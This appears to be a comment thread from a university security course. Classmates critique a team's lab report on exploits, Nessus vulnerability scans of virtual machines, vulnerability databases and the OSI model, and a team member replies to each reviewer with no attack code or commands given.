In the methodology section, team three was able to find out what vulnerabilities affected what virtual machine by running Nessus against all of the virtual machines. This approach was used by other teams as well including the team I am on. I was not sure why the team performed the step when they stated that “The tests were performed, and the result saved as an HTML report, which was then mailed to and accessed via an ‘offsite’ mail account for ease of examination.” The version of Nessus that my team was running allowed the team to view the results within the Nessus program and save the results so that report could be referenced again in the future. Perhaps the configuration of team’s version of Nessus was different from the one that was executed by my team.
In the results section team three listed Vulnerability Notes Database, Secunia, the National Vulnerability Database (NVD) and The Open Source Vulnerability Database (OSVDB) as on-line vulnerability identification sources. In determining the amount of expertise involved, team three concluded “Secunia was the only one of the four that appeared to have internal sources for vulnerability discovery and verification of both the vulnerability and the solution.” Team three did not appear to tabulate the vulnerabilities that were found online into a table based on the OSI model and McCumber’s cube.
In the issue section, I did not understand what the team meant when they stated “Foremost, some vulnerabilities reported by NESSUS appeared largely ‘theoretical’ in nature, as no known exploit code was found capable of utilizing these vulnerabilities.” Nessus did find vulnerabilities in some services without going into much detail about the vulnerability, was that what the team meant, for it gave no way to actually correct the vulnerability?
In the conclusion section, team three came to a similar conclusion that most of the other teams came to when they stated “we have found the majority of vulnerabilities to lie in the OSI model upper layers, largely in layer seven; and to be overwhelmingly associated with the technology-processing subspace of the McCumber cube construct. “
I think that group 3’s write-up for lab 4 was good. The abstract and introduction for this lab was very good. The literary review was somewhat very good. Group answered all of the required questions for the literature review. All of the citing for the literary review was present, but not proper throughout the lab. The literature review was cited properly, except when including page numbers. The author and year of the reference should be included in addition to the page number. For part 1, many of the required sections were missing. The group basically ran a vulnerability scan against a target machine as their only form of research. The group’s findings lacked analysis for the scan and most of what was included in their findings seemed more like methods. For part 2, the group did a good job of answering all of the required questions. However, the group only discusses vulnerability databases and not exploit-code databases. The conclusion to this laboratory was also well done because it accurately sums up their procedures and findings.
The team starts off with their abstract and explains what is going to happen within the lab. Then they describe what is going to be accomplished using different tools to test any exploits that they encounter. Next they go on to discuss possibilities for testing the systems. They define exploitation in their standard to solidify their views when going into this lab. One question that came to my mind when they went further into defining exploitation was What if a user accidently stumbled upon vulnerability and did not know? Would this be a form of exploitation if the modified or gained access just by accident? An example that I could think of would be someone using a “time machine” and go back it time and the land on a plant and alter the outcome of the future. It is understood that the “time machine” would be the tool. The user or users however did not know that they would be altering the future by squashing a plant during their time travels. Next the group goes on to review the literature again they separate the pieces of literature. Yes they do at the end discuss some of the over lining themes, but there is no cohesive arguments or thoughts between the literature. It make the literature review seem robotic and that sections of the papers where pulled out and listed then described. Again comparing and contrasting in a cohesive rather than split review would give readers the understanding that the team is under standing the topic and that they are not just listing details that have been found. Then they go onto discuss the methodologies and processes used within the hands on portion of the lab. This was one of the few that actually acknowledged testing more than one operating system and the different exploitations found. They also stated that most of the vulnerabilities where found within the application layer of the OSI seven layer model. I would have to agree with this point as many of the attacks that exploit systems start with the application layer and then reach down. I am not saying that there are not attacks that exploit other layers I just agree on what was found. Does the team feel that many attacks that are below the seventh layer are not discovered as often, or detected? Or is it that many systems may be more secure at the lower levels but when it comes to the application layer do developers not keep security in mind during the development life cycle? The team then goes on to discuss the issues that they had with the lab and the problems with the firewall on Windows XP sp3. Does the firewall provide a false sense of hope in many cases? Then once the firewall is down the attacks can really begin, and do developers of updates keep these exploits in mind? The team goes on to conclude with what they learned from the lab and that many of the exploits are found in the upper levels of the OSI seven layer model. This was a good lab report and the methodologies was the strong point for the report and has given this reader additional thoughts on the subject.
The team started with a strong abstract and indicating key points of there laboratory. They explained that the lab was to explain the purpose of security exploits. They propose a theoretical definition then to show exploits on the virtual hosts. The team then has an introduction, followed by there literature review. Both are in depth and provide great response. The team uses phrase “One cannot win a contest which does not exist”. To explain this they use the example that a password sniffer is an attack acted upon the network which exploited the system. I have a few questions, why must the password travel through the network? According to your setup of your virtual machines local logins seem to be used and they do not require a network authentication. The explanation seems not to answer or explain the phrase. I might be missing something but if the explanation was one can not gather a password through a password sniffer because the environment does not require the use of network login or certain exploits require a users input or perhaps a users carelessness.
The team has a choice on which tools to use, Nmap or Nessus. The team indicates that they are going to be using Nessus, like some of the other groups. I did wonder why the team decieded to go with Nessus over Nmap? Since the team picked Nessus they then went to the Nessus plugin listing. Then it was discovered that this route was untenable because of the web interface. They then decided to use common vulnerability and exposure listings to attack vulnerabilities. The team indicates that Nessus will be ran on there Windows SP 3 virtual machine, mainly because it was already installed. The Nessus scan which the team says scanned with all plug-ins. A question that I have is, what is considered all plug-ins, are there certain exploits that can be left out? What is considered “dangerous”, does this mean that the plug-in is going to break the target system?
@All: expertise is discussed, we just didn’t use the word. Perhaps it should have been made more clear.
@nbakker: seriously, what is your obsession with abstract length?
@mvanbode: Again with the tags? Really? Can you give me an example of any network stack that strictly follows OSI? You state,”The verb tense in the abstract is grammatical incorrect”. ‘Nuff said.
@tnovosel: the table was irrelevant.
In general, to all questions about turning off the firewall: the decision was somewhat arbitrary. We noted that neither of the other two Microsoft based machines had a firewall enabled, so we thought it fitting that the Windows XP SP 3 machine also should be without a firewall. It also allows examination of the evolution of the ‘base’ OS with respect to Windows XP, which we thought was useful, if not directly related to the lab exercise. Additionally, I think it makes sense to examine the security status of the unprotected OS in that the firewall is essentially a first line of defense. Once the firewall has been disabled (which is by no means a rare occurrence), the core OS must ‘stand on its own’ against any attack being made. Is the firewall a ‘false sense of security?’ No, it is an important defense mechanism, but it does not allow one to ignore other issues present with the OS under examination. Defense in depth is a time tested concept which ‘works.’
@nbakker: The issues with regard to lab seven were also on my mind when these ‘short lists’ were discovered. It will be interesting to see how it all plays out.
@jeikenbe, mvanbode with regards to testing multiple machines: was it wrong to test more than one machine? It didn’t seem to be that much more work, and it was something useful in planning for future lab exercises (i.e. lab seven).
@tnovosel with respect to emailing results offsite: if you hadn’t noticed, we are not big fans of VMware Workstation via Citrix. The biggest problem in this case is lack of ‘screen real estate.’ It is simply just easier to open up the results on a ‘big’ monitor with multiple tabs when sifting through them, versus trying to have multiple windows open on the tiny viewport presented by VMware workstation. With respect to ‘theoretical’ exploits: as we were looking for attack methods (and not corrective measures, as you suggest) this meant that a search for attack programs addressing the vulnerability resulted in finding nothing. Hence, exploit of these vulnerabilities is mostly ‘theoretical,’ at least at this time, as there are no known working implementations of attack. We would put these in the ‘could work’ category of exploits.
@prennick: We did a fair bit more than ‘just running a vulnerability scan’ as witnessed by our tables with specific attack methods discovered, and the descriptions of successful exploits using some of these means. What exactly do you mean by lack “…of analysis for the scan?” Should we have proposed reasons why some systems did not have certain vulnerabilities? I did not see this requirement in the lab instructions: indeed, this might have been considered ‘unrelated to the lab’ by some.
@shumpfer: I’m not really following the “time machine crushes plant” example (this is science fiction: how is it anything more than raw speculation?), but as far as the ‘accidental’ nature of opportunity, I would suggest many vulnerabilities are found ‘accidentally’ or randomly (e.g. fuzzing program inputs, etc.): it really is a matter of what is done with this knowledge after it is discovered.
@chaveza: We arbitrarily chose Nessus because it was one of two valid options; need we rationalize it further? The various configuration parameters of Nessus are well documented: the ‘default’ settings disable any plug-ins which can take down the remote host. The ‘all’ is, well, ‘all plug-ins available.’ This becomes an important distinction from the ‘default’ configuration, which I believe is demonstrated by our results. The question on the ‘password’ scenario: it was a general example, and not specifically meant to relate to our test setup. It does not attempt to address ‘all’ password attack scenarios. I think what you are referring to is a ‘weak password’ exploit: this is using a different vulnerability than ‘unprotected’ passwords or data, and so is another category altogether.